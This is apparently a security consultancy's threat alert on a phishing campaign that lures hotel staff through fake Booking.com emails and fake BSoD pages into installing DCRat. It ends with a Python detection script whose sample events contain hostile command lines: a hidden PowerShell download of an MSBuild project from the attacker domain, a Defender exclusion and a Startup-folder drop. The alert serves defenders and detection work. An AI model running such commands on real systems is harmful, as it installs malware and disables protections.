Perceptive Security
SOC/SIEM Consultancy

Fake Booking Emails Redirect Hotel Staff to Fake BSoD Pages Delivering DCRat
Published:
6 January 2026 at 12:13:00
Alert date:
6 January 2026 at 13:02:38
Source:
thehackernews.com
Ransomware & Malware, Email & Messaging, Enterprise Applications
Cybersecurity researchers have disclosed a new campaign called PHALT#BLYX targeting the European hospitality sector. The campaign uses fake booking emails to redirect hotel staff to fraudulent blue screen of death (BSoD) pages. These pages employ ClickFix-style social engineering lures that trick victims into downloading and executing malicious code. The ultimate objective is to deliver DCRat, a remote access trojan that provides attackers with persistent access to compromised systems. The multi-stage attack specifically targets hotel staff who are likely to receive booking-related communications.
Technical details
The PHALT#BLYX campaign uses ClickFix-style lures displaying fake BSoD errors. Attack chain:
1) Phishing email impersonating Booking.com with a link to a fake website.
2) Fake CAPTCHA page leading to a bogus BSoD with "recovery" instructions.
3) PowerShell dropper downloads an MSBuild project file (v.proj) from 2fa-bns[.]com.
4) MSBuild.exe executes the embedded payload, which configures Microsoft Defender exclusions, sets up persistence in the Startup folder, and launches DCRat.
The malware can disable security programs if it has admin privileges, or trigger UAC prompts every 2 seconds. It also opens the legitimate Booking.com page as a distraction. DCRat is a .NET trojan with a plugin-based architecture for keylogging, command execution, and delivery of additional payloads, including cryptocurrency miners.
Mitigation steps:
Monitor for suspicious MSBuild.exe executions (for example, launched from a shell or building a project file in a user-writable path).
Implement email filtering for messages impersonating Booking.com.
Watch for modifications to Microsoft Defender exclusions.
Detect PowerShell commands that download remote content.
Monitor for persistence mechanisms in the Startup folder.
Be alert for repeated UAC prompts.
Implement user awareness training about fake BSoD pages and ClickFix lures.
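As an added example (not from the alert or its source), the detection-oriented mitigation steps above expressed as rules run over a few constructed Sysmon-style process-creation and file-creation events. Field names follow Sysmon; the host paths, user name and upd.exe filename are assumptions, while v.proj and 2fa-bns[.]com are the IOCs listed in this alert.

```python
import re

# Constructed sample events modelled on Sysmon EventID 1 (process create) and
# EventID 11 (file create). Paths and the upd.exe filename are made up; the
# v.proj name and 2fa-bns[.]com domain are the IOCs given in the alert.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -c "iwr hxxp://2fa-bns[.]com/v.proj -OutFile $env:TEMP\v.proj"'},
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"MSBuild.exe C:\Users\staff\AppData\Local\Temp\v.proj"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "CommandLine": r"powershell Add-MpPreference -ExclusionPath C:\Users\staff\AppData\Roaming"},
    {"EventID": 11, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "TargetFilename": r"C:\Users\staff\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upd.exe"},
    # Benign developer build: MSBuild launched by Visual Studio on a project under C:\src
    {"EventID": 1, "Image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
]

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOWNLOAD_RE = re.compile(r"\b(Invoke-WebRequest|iwr|curl|wget|Invoke-RestMethod|DownloadString|DownloadFile|WebClient)\b", re.I)
USER_WRITABLE_RE = re.compile(r"\\(Temp|AppData|Downloads|Public|ProgramData)\\", re.I)
DEFENDER_RE = re.compile(r"(Add|Set)-MpPreference\b.*-(Exclusion\w*|Disable\w*)", re.I)
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(event):
    """Return the names of the alert's monitoring checks that one event trips."""
    hits = []
    if event.get("EventID") == 1:
        image, parent = basename(event.get("Image", "")), basename(event.get("ParentImage", ""))
        cmd = event.get("CommandLine", "")
        # MSBuild started from a shell, or building a project file in a user-writable path
        if image == "msbuild.exe" and (parent in SHELLS or USER_WRITABLE_RE.search(cmd)):
            hits.append("msbuild_suspicious_project")
        if image in SHELLS and DOWNLOAD_RE.search(cmd):
            hits.append("powershell_remote_download")
        if DEFENDER_RE.search(cmd):
            hits.append("defender_exclusion_change")
    elif event.get("EventID") == 11 and STARTUP_RE.search(event.get("TargetFilename", "")):
        hits.append("startup_folder_persistence")
    return hits
```

Several distinct checks tripping on one host within a short window is the stronger signal; each rule alone will also fire on legitimate build or admin activity, so tune the parent-process and path conditions to your environment.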
Affected products:
Microsoft Defender Antivirus
MSBuild.exe
Windows
Booking.com (impersonated)
Related links:
https://thehackernews.com/2025/08/clickfix-malware-campaign-exploits.html
https://en.wikipedia.org/wiki/Blue_screen_of_death
https://thehackernews.com/2024/09/new-html-smuggling-campaign-delivers.html
https://www.securonix.com/blog/analyzing-phaltblyx-how-fake-bsods-and-trusted-build-tools-are-used-to-construct-a-malware-infection/
https://thehackernews.com/2025/03/cert-ua-warns-dark-crystal-rat-targets.html
Related CVEs:
Related threat actors:
IOCs:
low-house[.]com, 2fa-bns[.]com, v.proj
This article was created with the assistance of AI technology by Perceptive.
